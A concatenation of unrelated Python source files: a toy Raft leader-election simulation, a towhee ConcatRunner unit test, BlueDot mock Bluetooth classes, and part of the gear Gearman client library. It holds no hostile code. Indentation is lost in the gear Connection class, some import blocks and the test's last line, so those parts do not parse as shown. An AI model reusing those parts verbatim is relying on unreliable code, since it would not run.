                d['queue'].put(m)

    # Return an ok vote to the candidate_id node
    def give_vote_to(self, nodes, candidate_id):
        for d in nodes:
            if d['node'].i == candidate_id:
                m_ret = {'type':'vote', 'from':self.i}
                d['queue'].put(m_ret)

    # Someone asked us to vote for them. We must not already have a leader, and
    # we must be a follower or not already a candidate.
    def manage_ask_vote(self, m, nodes):
        if self.leader == None and self.state in ['follower', 'wait_for_candidate']: # no leader? ok vote for you guy!
            self.set_state('did-vote')
            candidate_id = m['candidate']
            self.give_vote_to(nodes, candidate_id)

    # Someone did vote for me, but I must be a candidate to accept this
    def manage_vote(self, m, nodes):
        if self.state != 'candidate': # exit if not already a candidate
            return
        self.nb_vote += 1
        # Strict majority of the cluster is required to win the election.
        quorum_size = math.ceil(float(len(nodes)+1)/2)
        #print "I (%d) got a new voter %d" % (n.i, self.nb_vote)
        if self.nb_vote >= quorum_size:
            print "I (%d) did win the vote! with %d" % (self.i, self.nb_vote)
            self.set_state('leader')
            # warn everyone that I am the leader
            m_broad = {'type':'leader-elected', 'leader':self.i}
            self.send_to_others(nodes, m_broad)

    # A new leader is elected, take it
    def manage_leader_elected(self, m, nodes):
        elected_id = m['leader']
        if elected_id == self.i:
            # that's me, I already know about it...
            return
        if self.state == 'leader': # another leader?
            # TODO: split-brain case (two leaders) is not handled yet.
            print "TO MANAGE"*100, self.i, elected_id, self.term
        elif self.state in ['candidate', 'follower', 'did-vote']: #
            #print "GOT A LEADER JUST ELECTED", self.i, elected_id
            self.leader = None
            for d in nodes:
                if d['node'].i == elected_id:
                    self.leader = d['node']
            # Maybe it was a fake leader?
            if self.leader is None:
                return
            if self.state == 'candidate':
                print "I (%d) got a new leader (%d) before me, and I respect it" % (self.i, self.leader.i)
            self.nb_vote = 0
            self.set_state('follower')
            self.t_to_candidate = 0
            self.last_leader_talk = time.time()

    # The leader pinged us; refresh the heartbeat deadline.
    def manage_leader_heartbeat(self, m, nodes):
        leader_id = m['leader']
        if self.leader is None:
            # TODO: get the new leader? only if term is possible of course
            return
        if leader_id != self.leader.i:
            print "NOT THE GOOD LEADER ASK US? WTF"
            sys.exit(2)
            return
        if self.state != 'follower':
            print "A leader ask me to ping but I am not a follower"
            return
        print "Acception leader ping"
        # Ok accept this leader ping
        self.last_leader_talk = time.time()

    def look_for_candidated(self, nodes):
        # Become a candidate once our random election timeout has expired.
        if time.time() > self.t_to_candidate:
            print "N %d is going to be a candidate!" % self.i, self.state, self.leader
            #self.state = self.raft_state = 'candidate'
            self.set_state('candidate')
            self.nb_vote = 1 # I vote for me!
            possible_voters = nodes[:]
            random.shuffle(possible_voters) # so not everyone is asking the same node at the same time
            m = {'type':'ask-vote', 'candidate':self.i}
            self.send_to_others(possible_voters, m)

    # Leader-only: ping all followers so they keep respecting us.
    def launch_heartbeat_to_others(self, nodes):
        m = {'type':'leader-heartbeat', 'leader':self.i}
        self.send_to_others(nodes, m)

    # We did fail to elect someone, so we increase the election_turn
    # so we will wait more before being candidate.
    # Also reset the states.
    def fail_to_elect(self):
        print "Fail to elect, inscrease election turn"
        self.election_turn += 1
        self.reset()

    # Get back to default values for vote things :)
    def reset(self):
        self.nb_vote = 0
        self.set_state('follower')
        self.t_to_candidate = 0
        self.leader = None
        self.last_leader_talk = 0

    def main(self, q, nodes):
        # Thread entry point: run election rounds until stopped.
        while not self.interrrupted:
            self.node_loop(q, nodes)
            if self.state not in ['did-vote', 'follower']:
                print "END Of loop", self.state, self.term
            if self.state == 'leader':
                print "I AM STILL THE LEADER OF THE TERM", self.term
                #time.sleep(1)
                continue
            # maybe we are not the leader and so we must look if locally
            # we are ok
            if self.state in ['follower', 'candidate', 'did-vote']:
                if self.leader is not None:
                    continue
                else:
                    self.fail_to_elect()
                    continue

    def node_loop(self, q, nodes):
        # One message-pump pass: drain the inbox, then advance the state machine.
        time.sleep(2)
        start = time.time()
        n = self
        #print "Go run node", n.i, n.state
        #print 'All nodes', ','.join([str(e['node']) for e in nodes])
        #print n
        while not self.interrrupted:#time.time() < start + (self.HEARTHBEAT_TIMEOUT/1000.0)*2:
            # look for a message before looking for a new state :)
            try:
                r = q.get_nowait()
            except Empty:
                r = ''
            if r:
                m = r
                #print " %d I got a message: %s" % (n.i, m)
                # Someone asks us to vote for them. We can only if we got no valid
                # leader and we are a follower or not yet a candidate.
                if m['type'] == 'ask-vote':
                    self.manage_ask_vote(m, nodes)
                if m['type'] == 'vote': # someone did vote for me?
                    self.manage_vote(m, nodes)
                # someone won the match, respect it
                if m['type'] == 'leader-elected':
                    self.manage_leader_elected(m, nodes)
                # a leader just pinged me :)
                if m['type'] == 'leader-heartbeat':
                    self.manage_leader_heartbeat(m, nodes)
                # loop as fast as possible to get a new message now
                continue
            print "LOOP", self, "leader", self.leader
            # If we are a follower without a leader, it means we are at the beginning
            # of our job and we need to see when we will start to be a candidate.
            if self.leader == None and self.state == 'follower':
                low_election_timeout, high_election_timout = self.ELECTION_TIMEOUT_LIMITS
                #print "INCREASING LOOP", 2**self.election_turn, high_election_timout * (2**self.election_turn)
                #if high_election_timout > self.HEARTHBEAT_TIMEOUT:
                #    print 'WARNING, your election timeout is getting too high to be viable'
                    #high_election_timout = self.HEARTHBEAT_TIMEOUT
                    #os._exit(2)
                # ask for a timeout between 150 and 300ms
                election_timeout = random.randint(low_election_timeout, high_election_timout) * 0.001
                self.t_to_candidate = time.time() + election_timeout
                self.set_state('wait_for_candidate')
            # if we have a leader and we are a follower, we must look if the leader
            # did talk to us lately. If not, we start a new term
            elif self.leader is not None and self.state == 'follower':
                now = time.time()
                if now > self.last_leader_talk + self.HEARTHBEAT_TIMEOUT/1000:
                    print self.i, "my leader is too old, I refute it"
                    self.leader = None
            elif self.state == 'wait_for_candidate':
                self.look_for_candidated(nodes)
            # If I am the leader, we ping others so they respect us
            elif self.state == 'leader':
                self.launch_heartbeat_to_others(nodes)
            time.sleep(0.01)
N = 3
# Module-level cluster shared across election rounds: each entry pairs a
# node with its inbox queue.
nodes = [{'node':RaftNode(i), 'queue': Queue()} for i in range(N)]


def do_the_job(LOOP):
    # Run one election round: start every node's main loop in a daemon thread,
    # wait for them, then check that exactly one leader was elected.
    #nodes = [{'node':RaftNode(i), 'queue': Queue()} for i in range(N)]
    threads = []
    for d in nodes:
        n = d['node']
        q = d['queue']
        t = threading.Thread(None, target=n.main, name='node-%d' % n.i, args=(q, nodes))
        t.daemon = True
        t.start()
        threads.append(t)
    for t in threads:
        t.join()

    # did we get a leader?
    print "RESULT FOR", LOOP
    leader = None
    max_vote = 0
    for d in nodes:
        n = d['node']
        max_vote = max(max_vote, n.nb_vote)
        if n.state == 'leader':
            if leader != None:
                # two leaders is an algorithm violation: abort loudly
                print "WE GOT 2 LEADER, WTF DID YOU DID JEAN?????"
                sys.exit("JEAN HOW CAN YOU BREAK SUCH AN ALGO?")
            print "GOT A LEADER", n.i, 'with ', n.nb_vote, "LOOP", LOOP
            leader = n
    print "Candidate density::", LOOP, 300*(2**LOOP) / float(N), "ms", "& number of candidate in this loop (%d)" % LOOP, len([d for d in nodes if d['node'].state in ('candidate', 'leader')])
    if leader is not None:
        print "Good job jim", "LOOP", LOOP
        sys.exit(0)
    print "No leader, max vote is", max_vote


if __name__ == '__main__':
    LOOP = 0
    # Keep retrying elections (with increasing candidate back-off) until one succeeds.
    while True:
        LOOP += 1
        # Start with basic election
        do_the_job(LOOP)
        for d in nodes:
            n = d['node']
            n.fail_to_elect()
|
test_concat_runner.py | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from typing import Dict
import threading
from queue import Queue
from towhee.engine.operator_runner.runner_base import RunnerStatus
from towhee.engine.operator_runner.concat_runner import ConcatRunner
from towhee.operator.concat_operator import ConcatOperator
DATA_QUEUE = Queue()
class StopFrame:
    """Sentinel placed on a data queue to signal end-of-stream to MockReader."""
    pass
class MockReader:
    """
    Mock reader: pulls frames from a queue until a StopFrame sentinel appears.
    """

    def __init__(self, queue: Queue):
        self._queue = queue

    def read(self):
        """Return the next frame; raise StopIteration at end-of-stream."""
        frame = self._queue.get()
        if isinstance(frame, StopFrame):
            # Re-queue a sentinel so any further read() also sees end-of-stream.
            self._queue.put(StopFrame())
            raise StopIteration()
        return frame
class MockWriter:
    """Mock writer: records every payload written to it in ``res``."""

    def __init__(self):
        # Written payloads, in write order; inspected by the tests.
        self.res = []

    def write(self, data: Dict) -> None:
        """Record *data* as the next written payload."""
        self.res.append(data)
def run(runner):
    """Thread target: drive the runner's process loop until it finishes."""
    runner.process()
class TestConcatRunner(unittest.TestCase):
    """
    Concat runner test: three input queues are concatenated row-wise; when one
    input stops, the remaining inputs continue to be merged.
    """
    def test_concat_runner(self):
        data_queue_1 = Queue()
        data_queue_2 = Queue()
        data_queue_3 = Queue()
        writer = MockWriter()
        runner = ConcatRunner(
            'test',
            0,
            'add_operator',
            'main',
            'mock_operators', {'num': 1}, [MockReader(data_queue_1), MockReader(data_queue_2), MockReader(data_queue_3)],
            writer
        )
        runner.set_op(ConcatOperator('row'))
        # run the runner in a background thread while this test feeds the queues
        t = threading.Thread(target=run, args=(runner, ))
        t.start()
        # NOTE(review): asserting RUNNING immediately after start() assumes the
        # worker thread has entered process() — confirm this cannot race.
        self.assertEqual(runner.status, RunnerStatus.RUNNING)
        res = []
        # phase 1: all three inputs produce rows, expect fully merged dicts
        for i in range(3):
            data_queue_1.put({'num1': i})
            data_queue_2.put({'num2': i})
            data_queue_3.put({'num3': i})
            res.append({'num1': i, 'num2': i, 'num3': i})
        # phase 2: input 2 stops; remaining inputs are still concatenated
        data_queue_2.put(StopFrame())
        for i in range(3):
            data_queue_1.put({'num1': i + 3})
            data_queue_3.put({'num3': i + 3})
            res.append({'num1': i + 3, 'num3': i + 3})
        data_queue_1.put(StopFrame())
        data_queue_3.put(StopFrame())
        runner.join()
        for i in range(len(writer.res)):
            self.assertEqual(writer.res[i], res[i])
        self.assertEqual(runner.status, RunnerStatus.FINISHED)
if __name__ == '__main__':
unittest.main()
|
mock.py | from .btcomm import BluetoothServer, BluetoothClient, BluetoothAdapter
from .dot import BlueDot
from .threads import WrapThread
from .constants import PROTOCOL_VERSION
CLIENT_NAME = "Mock client"
class MockBluetoothAdapter(BluetoothAdapter):
    """
    Mock adapter holding power/discoverable/pairable state in plain attributes
    instead of talking to a real Bluetooth stack.
    """
    def __init__(self, device = "mock0", address = "00:00:00:00:00:00"):
        # NOTE(review): deliberately does not call super().__init__(), so no real
        # adapter is touched — confirm the parent keeps no required extra state.
        self._device = device
        self._address = address
        self._powered = True
        self._discoverable = False
        self._pairable = False
        self._pairing_thread = None

    @property
    def powered(self):
        return self._powered

    @powered.setter
    def powered(self, value):
        self._powered = value

    @property
    def discoverable(self):
        return self._discoverable

    @discoverable.setter
    def discoverable(self, value):
        self._discoverable = value

    @property
    def pairable(self):
        return self._pairable

    @pairable.setter
    def pairable(self, value):
        self._pairable = value

    @property
    def paired_devices(self):
        # Fixed fake pairing list for tests.
        return [["01:01:01:01:01:01", "mock_device_1"], ["02:02:02:02:02:02", "mock_device_2"]]
class MockBluetoothServer(BluetoothServer):
    """
    :class:`MockBluetoothServer` inherits from
    :class:`~.btcomm.BluetoothServer` but overrides ``__init__``, :meth:`start`
    , :meth:`stop` and :meth:`send_raw` to create a :class:`MockBluetoothServer` which can
    be used for testing and debugging.
    """
    def __init__(self,
                 data_received_callback,
                 auto_start = True,
                 device = "mock0",
                 port = 1,
                 encoding = "utf-8",
                 power_up_device = False,
                 when_client_connects = None,
                 when_client_disconnects = None):
        super(MockBluetoothServer, self).__init__(
            data_received_callback,
            auto_start,
            device,
            port,
            encoding,
            power_up_device,
            when_client_connects,
            when_client_disconnects)
        # no client attached until mock_client_connected() is called
        self._mock_client = None

    def start(self):
        # no real socket is opened; just flip the running flag
        self._running = True

    def stop(self):
        self._running = False

    def mock_client_connected(self, mock_client = None):
        """
        Simulates a client connected to the :class:`~.btcomm.BluetoothServer`.

        :param MockBluetoothClient mock_client:
            The mock client to interact with, defaults to `None`. If `None`,
            client address is set to '99:99:99:99:99:99'
        """
        self._mock_client = mock_client
        if not self._client_connected:
            if self._mock_client is None:
                client_address = "99:99:99:99:99:99"
            else:
                client_address = self._mock_client.adapter.address
            self._client_connected = True
            self._client_info = (client_address, self.port)
            # call the callback in its own thread, mirroring the real server
            if self.when_client_connects:
                WrapThread(target=self.when_client_connects).start()

    def mock_client_disconnected(self):
        """
        Simulates a client disconnecting from the
        :class:`~.btcomm.BluetoothServer`.
        """
        if self._client_connected:
            self._client_connected = False
            self._client_info = None
            # NOTE(review): guards on `_when_client_disconnects` but calls
            # `when_client_disconnects` — confirm both resolve to the same
            # callback on the parent class.
            if self._when_client_disconnects:
                WrapThread(target=self.when_client_disconnects).start()

    def mock_client_sending_data(self, data):
        """
        Simulates a client sending data to the
        :class:`~.btcomm.BluetoothServer`.
        """
        if self._client_connected:
            self._data_received_callback(data)

    def _send_data(self, data):
        # Instead of a socket write, forward straight to the attached mock client.
        if self._mock_client is not None:
            # call the data received callback
            if self._encoding:
                data = data.decode(self._encoding)
            self._mock_client.mock_server_sending_data(data)

    def _setup_adapter(self, device):
        # replace the real adapter with the mock one
        self._adapter = MockBluetoothAdapter(device)
class MockBluetoothClient(BluetoothClient):
    """
    :class:`MockBluetoothClient` inherits from
    :class:`~.btcomm.BluetoothClient` but overrides ``__init__``, :meth:`connect`
    and :meth:`send_raw` to create a :class:`MockBluetoothServer` which can
    be used for testing and debugging.

    Note - the `server` parameter should be an instance of :class:`MockBluetoothServer`.
    """
    def __init__(self,
                 server,
                 data_received_callback,
                 port = 1,
                 device = "mock1",
                 encoding = "utf-8",
                 power_up_device = False,
                 auto_connect = True):
        super(MockBluetoothClient, self).__init__(
            server,
            data_received_callback,
            port,
            device,
            encoding,
            power_up_device,
            auto_connect)

    def connect(self):
        """
        Connect to a Bluetooth server.
        """
        # register with the mock server instead of opening a socket
        self._server.mock_client_connected(self)
        self._connected = True

    def disconnect(self):
        """
        Disconnect from a Bluetooth server.
        """
        self._server.mock_client_disconnected()
        self._connected = False

    def mock_server_sending_data(self, data):
        """
        Simulates a server sending data to the
        :class:`~.btcomm.BluetoothClient`.
        """
        if self._connected:
            self._data_received_callback(data)

    def _send_data(self, data):
        # send data to the server
        # call the data received callback
        if self._encoding:
            data = data.decode(self._encoding)
        self._server.mock_client_sending_data(data)

    def _setup_adapter(self, device):
        # distinct address from the server's adapter so both ends are identifiable
        self._adapter = MockBluetoothAdapter(device, address = "11:11:11:11:11:11")
class MockBlueDot(BlueDot):
    """
    :class:`MockBlueDot` inherits from :class:`BlueDot` but overrides
    :meth:`_create_server`, to create a :class:`~.mock.MockBluetoothServer`
    which can be used for testing and debugging.
    """
    def _create_server(self):
        # swap the real Bluetooth server for the mock one
        self._server = MockBluetoothServer(
                self._data_received,
                when_client_connects = self._client_connected,
                when_client_disconnects = self._client_disconnected,
                device = self.device,
                port = self.port,
                power_up_device = self._power_up_device,
                auto_start = False)

    def mock_client_connected(self):
        """
        Simulates a client connecting to the Blue Dot and sending the
        protocol-version handshake.
        """
        self._server.mock_client_connected()
        # send protocol version to server
        self._server.mock_client_sending_data("3,{},{}\n".format(PROTOCOL_VERSION, CLIENT_NAME))

    def mock_client_disconnected(self):
        """
        Simulates a client disconnecting from the Blue Dot.
        """
        self._server.mock_client_disconnected()

    def mock_blue_dot_pressed(self, x, y):
        """
        Simulates the Blue Dot being pressed.

        :param int x:
            The x position where the mock Blue Dot was pressed
        :param int y:
            The y position where the mock Blue Dot was pressed
        """
        # operation 1 == press in the wire protocol
        self._server.mock_client_sending_data("1,{},{}\n".format(x, y))

    def mock_blue_dot_released(self, x, y):
        """
        Simulates the Blue Dot being released.

        :param int x:
            The x position where the mock Blue Dot was released
        :param int y:
            The y position where the mock Blue Dot was released
        """
        # operation 0 == release in the wire protocol
        self._server.mock_client_sending_data("0,{},{}\n".format(x, y))

    def mock_blue_dot_moved(self, x, y):
        """
        Simulates the Blue Dot being moved.

        :param int x:
            The x position where the mock Blue Dot was moved too
        :param int y:
            The y position where the mock Blue Dot was moved too
        """
        # operation 2 == move in the wire protocol
        self._server.mock_client_sending_data("2,{},{}\n".format(x, y))

    def launch_mock_app(self):
        """
        Launches a mock Blue Dot app.

        The mock app reacts to mouse clicks and movement and calls the mock blue
        dot methods to simulates presses.

        This is useful for testing, allowing you to interact with Blue Dot without
        having to script mock functions.

        The mock app uses pygame which will need to be installed.
        """
        self._mock_app_thread = WrapThread(target=self._launch_mock_app)
        self._mock_app_thread.start()

    def _launch_mock_app(self):
        # imported here, so pygame is only a pre-requisite for the mock app
        from .app import BlueDotClient, ButtonScreen

        class MockBlueDotClient(BlueDotClient):
            # app client whose screen talks to the mock server
            def _run(self):
                button_screen = MockButtonScreen(self._screen, self._font, self._device, self._server, self._width, self._height)
                button_screen.run()

        class MockButtonScreen(ButtonScreen):
            # screen that connects via MockBluetoothClient instead of a socket
            def _connect(self):
                self.bt_client = MockBluetoothClient(self.server, self._data_received, device = self.device, auto_connect = True)

        MockBlueDotClient("mock2", self._server, None, None, None)
|
__init__.py | # Copyright 2013-2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import logging
import os
import random
import select
import six
import socket
import ssl
import struct
import threading
import time
import uuid as uuid_module
from gear import constants
from gear.acl import ACLError, ACLEntry, ACL # noqa
try:
import Queue as queue_mod
except ImportError:
import queue as queue_mod
try:
import statsd
except ImportError:
statsd = None
PRECEDENCE_NORMAL = 0
PRECEDENCE_LOW = 1
PRECEDENCE_HIGH = 2
class ConnectionError(Exception):
    # Connection-level failure (connect/send/receive).
    # NOTE(review): shadows the Python 3 builtin ConnectionError; kept for API compat.
    pass


class InvalidDataError(Exception):
    # Malformed or unexpected data received from a server.
    pass


class ConfigurationError(Exception):
    # Client/worker configured inconsistently or incompletely.
    pass


class NoConnectedServersError(Exception):
    # An operation required a server but no connection is available.
    pass


class UnknownJobError(Exception):
    # A server referenced a job handle this client does not know.
    pass


class InterruptedError(Exception):
    # A blocking wait was interrupted.
    # NOTE(review): shadows the Python 3 builtin InterruptedError; kept for API compat.
    pass


class TimeoutError(Exception):
    # A blocking wait exceeded its timeout.
    # NOTE(review): shadows the Python 3 builtin TimeoutError; kept for API compat.
    pass


class GearmanError(Exception):
    # Generic protocol-level Gearman error.
    pass


class DisconnectError(Exception):
    # The remote side disconnected mid-operation.
    pass


class RetryIOError(Exception):
    # A non-fatal I/O condition; the operation should be retried.
    pass
def convert_to_bytes(data):
    """Encode *data* to UTF-8 bytes when it is a text string.

    Values without an ``encode`` method (bytes, ints, None, ...) are
    returned unchanged.
    """
    try:
        return data.encode('utf8')
    except AttributeError:
        return data
def best_tls_version():
    """Return the newest TLS protocol constant this ``ssl`` module offers.

    :raises ConnectionError: If no TLS protocol is available at all.
    """
    # Note there is some risk in selecting tls 1.2 if available
    # as both the client and server may not support it and need 1.1
    # or 1.0. However, a xenial installation with python 3.5 does
    # support 1.2 which is probably as old a setup as we need to worry
    # about.
    for name in ('PROTOCOL_TLS', 'PROTOCOL_TLSv1_2',
                 'PROTOCOL_TLSv1_1', 'PROTOCOL_TLSv1'):
        version = getattr(ssl, name, None)
        if version is not None:
            return version
    raise ConnectionError('No supported TLS version available.')
class Task(object):
    """Base class for an asynchronous operation whose completion can be
    awaited with :py:meth:`wait`."""

    def __init__(self):
        # Set by setComplete() once the server has responded.
        self._wait_event = threading.Event()

    def setComplete(self):
        """Mark the task complete and wake any thread blocked in wait()."""
        self._wait_event.set()

    def wait(self, timeout=None):
        """Wait for a response from Gearman.

        :arg int timeout: If not None, return after this many seconds if no
            response has been received (default: None).
        """
        self._wait_event.wait(timeout)
        # Report whether completion (vs. timeout) ended the wait.
        return self._wait_event.is_set()
class SubmitJobTask(Task):
    """Task tracking the submission of a single job; completes when the
    server acknowledges it with JOB_CREATED."""

    def __init__(self, job):
        super(SubmitJobTask, self).__init__()
        # The Job object whose submission this task tracks.
        self.job = job
class OptionReqTask(Task):
    """Task tracking an OPTION_REQ packet; completes on OPTION_RES."""
    pass
class Connection(object):
"""A Connection to a Gearman Server.
:arg str client_id: The client ID associated with this connection.
It will be appending to the name of the logger (e.g.,
gear.Connection.client_id). Defaults to 'unknown'.
:arg bool keepalive: Whether to use TCP keepalives
:arg int tcp_keepidle: Idle time after which to start keepalives sending
:arg int tcp_keepintvl: Interval in seconds between TCP keepalives
:arg int tcp_keepcnt: Count of TCP keepalives to send before disconnect
"""
def __init__(self, host, port, ssl_key=None, ssl_cert=None, ssl_ca=None,
client_id='unknown', keepalive=False, tcp_keepidle=7200,
tcp_keepintvl=75, tcp_keepcnt=9):
self.log = logging.getLogger("gear.Connection.%s" % (client_id,))
self.host = host
self.port = port
self.ssl_key = ssl_key
self.ssl_cert = ssl_cert
self.ssl_ca = ssl_ca
self.keepalive = keepalive
self.tcp_keepcnt = tcp_keepcnt
self.tcp_keepintvl = tcp_keepintvl
self.tcp_keepidle = tcp_keepidle
self.use_ssl = False
if all([self.ssl_key, self.ssl_cert, self.ssl_ca]):
self.use_ssl = True
self.input_buffer = b''
self.need_bytes = False
self.echo_lock = threading.Lock()
self.send_lock = threading.Lock()
self._init()
def _init(self):
self.conn = None
self.connected = False
self.connect_time = None
self.related_jobs = {}
self.pending_tasks = []
self.admin_requests = []
self.echo_conditions = {}
self.options = set()
self.changeState("INIT")
def changeState(self, state):
# The state variables are provided as a convenience (and used by
# the Worker implementation). They aren't used or modified within
# the connection object itself except to reset to "INIT" immediately
# after reconnection.
self.log.debug("Setting state to: %s" % state)
self.state = state
self.state_time = time.time()
def __repr__(self):
return '<gear.Connection 0x%x host: %s port: %s>' % (
id(self), self.host, self.port)
def connect(self):
"""Open a connection to the server.
:raises ConnectionError: If unable to open the socket.
"""
self.log.debug("Connecting to %s port %s" % (self.host, self.port))
s = None
for res in socket.getaddrinfo(self.host, self.port,
socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
if self.keepalive and hasattr(socket, 'TCP_KEEPIDLE'):
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE,
self.tcp_keepidle)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL,
self.tcp_keepintvl)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT,
self.tcp_keepcnt)
elif self.keepalive:
self.log.warning('Keepalive requested but not available '
'on this platform')
except socket.error:
s = None
continue
if self.use_ssl:
self.log.debug("Using SSL")
context = ssl.SSLContext(best_tls_version())
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = False
context.load_cert_chain(self.ssl_cert, self.ssl_key)
context.load_verify_locations(self.ssl_ca)
s = context.wrap_socket(s, server_hostname=self.host)
try:
s.connect(sa)
except socket.error:
s.close()
s = None
continue
break
if s is None:
self.log.debug("Error connecting to %s port %s" % (
self.host, self.port))
raise ConnectionError("Unable to open socket")
self.log.info("Connected to %s port %s" % (self.host, self.port))
self.conn = s
self.connected = True
self.connect_time = time.time()
self.input_buffer = b''
self.need_bytes = False
def disconnect(self):
"""Disconnect from the server and remove all associated state
data.
"""
if self.conn:
try:
self.conn.close()
except Exception:
pass
self.log.info("Disconnected from %s port %s" % (self.host, self.port))
self._init()
def reconnect(self):
"""Disconnect from and reconnect to the server, removing all
associated state data.
"""
self.disconnect()
self.connect()
def sendRaw(self, data):
"""Send raw data over the socket.
:arg bytes data The raw data to send
"""
with self.send_lock:
sent = 0
while sent < len(data):
try:
sent += self.conn.send(data)
except ssl.SSLWantReadError:
continue
except ssl.SSLWantWriteError:
continue
def sendPacket(self, packet):
"""Send a packet to the server.
:arg Packet packet: The :py:class:`Packet` to send.
"""
self.log.info("Sending packet to %s: %s" % (self, packet))
self.sendRaw(packet.toBinary())
def _getAdminRequest(self):
return self.admin_requests.pop(0)
def _readRawBytes(self, bytes_to_read):
while True:
try:
buff = self.conn.recv(bytes_to_read)
except ssl.SSLWantReadError:
continue
except ssl.SSLWantWriteError:
continue
break
return buff
def _putAdminRequest(self, req):
self.admin_requests.insert(0, req)
def readPacket(self):
"""Read one packet or administrative response from the server.
:returns: The :py:class:`Packet` or :py:class:`AdminRequest` read.
:rtype: :py:class:`Packet` or :py:class:`AdminRequest`
"""
# This handles non-blocking or blocking IO.
datalen = 0
code = None
ptype = None
admin = None
admin_request = None
need_bytes = self.need_bytes
raw_bytes = self.input_buffer
try:
while True:
try:
if not raw_bytes or need_bytes:
segment = self._readRawBytes(4096)
if not segment:
# This occurs when the connection is closed. The
# the connect method will reset input_buffer and
# need_bytes for us.
return None
raw_bytes += segment
need_bytes = False
except RetryIOError:
if admin_request:
self._putAdminRequest(admin_request)
raise
if admin is None:
if raw_bytes[0:1] == b'\x00':
admin = False
else:
admin = True
admin_request = self._getAdminRequest()
if admin:
complete, remainder = admin_request.isComplete(raw_bytes)
if remainder is not None:
raw_bytes = remainder
if complete:
return admin_request
else:
length = len(raw_bytes)
if code is None and length >= 12:
code, ptype, datalen = struct.unpack('!4sii',
raw_bytes[:12])
if length >= datalen + 12:
end = 12 + datalen
p = Packet(code, ptype, raw_bytes[12:end],
connection=self)
raw_bytes = raw_bytes[end:]
return p
# If we don't return a packet above then we need more data
need_bytes = True
finally:
self.input_buffer = raw_bytes
self.need_bytes = need_bytes
def hasPendingData(self):
return self.input_buffer != b''
def sendAdminRequest(self, request, timeout=90):
"""Send an administrative request to the server.
:arg AdminRequest request: The :py:class:`AdminRequest` to send.
:arg numeric timeout: Number of seconds to wait until the response
is received. If None, wait forever (default: 90 seconds).
:raises TimeoutError: If the timeout is reached before the response
is received.
"""
self.admin_requests.append(request)
self.sendRaw(request.getCommand())
complete = request.waitForResponse(timeout)
if not complete:
raise TimeoutError()
def echo(self, data=None, timeout=30):
"""Perform an echo test on the server.
This method waits until the echo response has been received or the
timeout has been reached.
:arg bytes data: The data to request be echoed. If None, a random
unique byte string will be generated.
:arg numeric timeout: Number of seconds to wait until the response
is received. If None, wait forever (default: 30 seconds).
:raises TimeoutError: If the timeout is reached before the response
is received.
"""
if data is None:
data = uuid_module.uuid4().hex.encode('utf8')
self.echo_lock.acquire()
try:
if data in self.echo_conditions:
raise InvalidDataError("This client is already waiting on an "
"echo response of: %s" % data)
condition = threading.Condition()
self.echo_conditions[data] = condition
finally:
self.echo_lock.release()
self.sendEchoReq(data)
condition.acquire()
condition.wait(timeout)
condition.release()
if data in self.echo_conditions:
return data
raise TimeoutError()
def sendEchoReq(self, data):
p = Packet(constants.REQ, constants.ECHO_REQ, data)
self.sendPacket(p)
def handleEchoRes(self, data):
condition = None
self.echo_lock.acquire()
try:
condition = self.echo_conditions.get(data)
if condition:
del self.echo_conditions[data]
finally:
self.echo_lock.release()
if not condition:
return False
condition.notifyAll()
return True
def handleOptionRes(self, option):
self.options.add(option)
class AdminRequest(object):
    """Encapsulates a request (and response) sent over the
    administrative protocol.  This is a base class that may not be
    instantiated directly; a subclass implementing a specific command
    must be used instead.

    :arg list arguments: A list of byte string arguments for the command.

    The following instance attributes are available:

    **response** (bytes)
      The response from the server.
    **arguments** (bytes)
      The argument supplied with the constructor.
    **command** (bytes)
      The administrative command.
    """

    command = None
    arguments = []
    response = None
    # Number of response bytes already scanned for the end marker; lets
    # isComplete() resume near where it stopped on a partial read.
    _complete_position = 0

    def __init__(self, *arguments):
        self.wait_event = threading.Event()
        self.arguments = arguments
        if type(self) == AdminRequest:
            raise NotImplementedError("AdminRequest must be subclassed")

    def __repr__(self):
        return '<gear.AdminRequest 0x%x command: %s>' % (
            id(self), self.command)

    def getCommand(self):
        """Return the full command line (command, arguments and trailing
        newline) to send to the server.

        :rtype: bytes
        """
        cmd = self.command
        if self.arguments:
            cmd += b' ' + b' '.join(self.arguments)
        cmd += b'\n'
        return cmd

    def isComplete(self, data):
        """Check whether *data* contains the complete response.

        :arg bytes data: All response bytes received so far.
        :returns: (True, remainder) once the terminating '.' line has been
            seen, otherwise (False, None).
        """
        x = -1
        # Resume a few bytes before the previously scanned end so a
        # terminator split across two reads is still detected.
        start = max(self._complete_position - 4, 0)
        end_index_newline = data.find(b'\n.\n', start)
        end_index_return = data.find(b'\r\n.\r\n', start)
        if end_index_newline != -1:
            x = end_index_newline + 3
        elif end_index_return != -1:
            x = end_index_return + 5
        elif data.startswith(b'.\n'):
            x = 2
        elif data.startswith(b'.\r\n'):
            x = 3
        self._complete_position = len(data)
        if x != -1:
            self.response = data[:x]
            return (True, data[x:])
        else:
            return (False, None)

    def setComplete(self):
        """Unblock any thread waiting in waitForResponse()."""
        self.wait_event.set()

    def waitForResponse(self, timeout=None):
        """Wait until the response has been received.

        :arg numeric timeout: Seconds to wait; None waits forever.
        :returns: True if the response arrived, False on timeout.
        """
        self.wait_event.wait(timeout)
        return self.wait_event.is_set()
class StatusAdminRequest(AdminRequest):
    """A "status" administrative request.

    The response from gearman may be found in the **response** attribute.
    """
